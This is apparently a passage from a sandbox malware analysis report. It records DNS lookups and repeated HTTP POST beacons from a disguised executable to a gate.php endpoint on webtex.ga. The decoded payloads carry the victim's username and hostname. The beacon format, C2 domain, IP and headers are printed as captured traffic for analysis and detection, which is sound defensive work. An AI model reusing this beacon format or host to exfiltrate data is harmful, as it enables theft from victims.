                                    Dec 3, 2020 10:04:15.214709044 CET8.8.8.8192.168.2.30x82a5No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.492562056 CET8.8.8.8192.168.2.30x1bb4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:15.769968987 CET8.8.8.8192.168.2.30xc751No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.049843073 CET8.8.8.8192.168.2.30x693fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.544792891 CET8.8.8.8192.168.2.30xaae8No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:16.847960949 CET8.8.8.8192.168.2.30x6eaNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.139122009 CET8.8.8.8192.168.2.30xdaf3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:17.860759974 CET8.8.8.8192.168.2.30x6912No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:18.159993887 CET8.8.8.8192.168.2.30xbb4No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:19.942914009 CET8.8.8.8192.168.2.30x48f0No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.253314972 CET8.8.8.8192.168.2.30x58ebNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.528146982 CET8.8.8.8192.168.2.30x58e2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:20.830697060 CET8.8.8.8192.168.2.30xfb15No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.274955034 CET8.8.8.8192.168.2.30xfcddNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.554297924 CET8.8.8.8192.168.2.30xe84cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:21.880640030 CET8.8.8.8192.168.2.30xaff7No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.148855925 CET8.8.8.8192.168.2.30xbb16No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.421103954 CET8.8.8.8192.168.2.30x7419No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:22.746226072 CET8.8.8.8192.168.2.30x1e85No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.007875919 CET8.8.8.8192.168.2.30x1d6fNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.281064034 CET8.8.8.8192.168.2.30x4e1cNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.568725109 CET8.8.8.8192.168.2.30xbd95No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:23.843622923 CET8.8.8.8192.168.2.30x617aNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.133373022 CET8.8.8.8192.168.2.30xc7ceNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.422159910 CET8.8.8.8192.168.2.30x35d2No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:24.713453054 CET8.8.8.8192.168.2.30x98b3No error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.332806110 CET8.8.8.8192.168.2.30xbedcNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)
                                    Dec 3, 2020 10:04:25.756966114 CET8.8.8.8192.168.2.30x908bNo error (0)webtex.ga47.91.79.163A (IP address)IN (0x0001)

                                    HTTP Request Dependency Graph

                                    • webtex.ga

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.34970947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:28.939497948 CET64OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 190
                                    Connection: close
                                    Dec 3, 2020 10:02:28.956579924 CET64OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz436432DESKTOP-716T771k08F9C4E9C79A3B52B3F739430t2Q5c
                                    Dec 3, 2020 10:02:29.004054070 CET65INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 15
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.34971047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:29.293359995 CET66OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 190
                                    Connection: close
                                    Dec 3, 2020 10:02:29.310045958 CET66OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: 'ckav.ruhardz436432DESKTOP-716T771+08F9C4E9C79A3B52B3F739430iyac2
                                    Dec 3, 2020 10:02:29.459626913 CET66INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:46 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 15
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    10192.168.2.34971947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:32.765127897 CET78OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:32.781712055 CET78OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:32.824419975 CET79INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    100192.168.2.34982247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:06.321847916 CET324OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:06.338506937 CET325OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:06.384399891 CET325INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:23 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    101192.168.2.34982347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:06.983531952 CET326OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:07.000179052 CET326OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:07.036550045 CET326INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    102192.168.2.34982547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:07.247567892 CET334OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:07.264730930 CET334OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:07.307060957 CET335INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    103192.168.2.34982647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:07.514055967 CET389OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:07.532093048 CET389OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:07.577130079 CET390INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    104192.168.2.34982847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:07.815653086 CET456OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:07.834088087 CET457OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:07.908293009 CET482INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    105192.168.2.34983047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:08.117953062 CET493OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:08.134882927 CET493OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:08.178643942 CET495INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    106192.168.2.34983247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:08.390971899 CET525OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:08.408489943 CET525OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:08.453232050 CET527INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    107192.168.2.34983447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:08.688532114 CET582OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:08.706233978 CET583OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:08.751399040 CET584INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    108192.168.2.34983647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:08.977335930 CET614OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:08.994072914 CET614OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:09.036973000 CET653INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    109192.168.2.34983847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:09.259969950 CET659OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:09.276686907 CET659OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:09.318355083 CET667INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    11192.168.2.34972047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:33.073391914 CET79OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:33.090715885 CET80OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:33.145654917 CET80INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:50 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    110192.168.2.34983947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:09.551736116 CET746OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:09.568320036 CET746OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:09.610619068 CET747INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    111192.168.2.34984147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:09.837841988 CET758OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:09.854460955 CET758OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:03:09.896492004 CET778INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:05:27 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    112192.168.2.34984247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:03:10.292766094 CET938OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:03:10.309562922 CET938OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
